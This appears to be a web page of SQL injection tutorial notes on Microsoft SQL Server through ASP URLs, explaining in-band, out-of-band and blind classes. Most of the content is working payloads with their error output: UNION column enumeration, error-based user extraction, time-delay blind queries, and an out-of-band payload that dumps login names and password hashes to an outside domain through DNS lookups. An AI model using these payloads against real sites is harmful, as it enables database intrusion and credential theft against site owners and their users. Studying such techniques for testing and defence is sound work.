3 Classes of SQL
SQL Injection can be broken up into 3 classes
Inband-data is extracted using the same channel that is used to inject the SQL code.
This is the most straightforward kind of attack, in which the retrieved data is presented
directly in the application web page
Out-of-Band-data is retrieved using a different channel
Inferential-there is no actual transfer of data, but the tester is able to reconstruct the
information by sending particular requests and observing the resulting behavior of the
website/DB Server.
Error-Based, and Union-Based SQL Injections
[site]/page.asp?id=1 or 1=convert(int,(USER))--
This is another way of getting the data out of the server
[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--
Blind SQL Injection
[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:10'--
SQL Injection Types
Error:
Asking the DB a question that will cause an error, and gleaning information from theerror.
Union:
The SQL UNION is used to combine the results of two or more SELECT SQL
statements into a single result. Really useful for SQL Injection :)
Blind:
Asking the DB a true/false question and using whether valid page returned or not, or by using
the time it took for your valid page to return as the answer to the question.
Examples:
site]/page.asp?id=1 having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
site]/page.asp?id=x'having 1=1--
Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
site]/page.asp?id=1 or 1=convert(int,(USER))--
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
Valid page returns immediately
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
0 Comments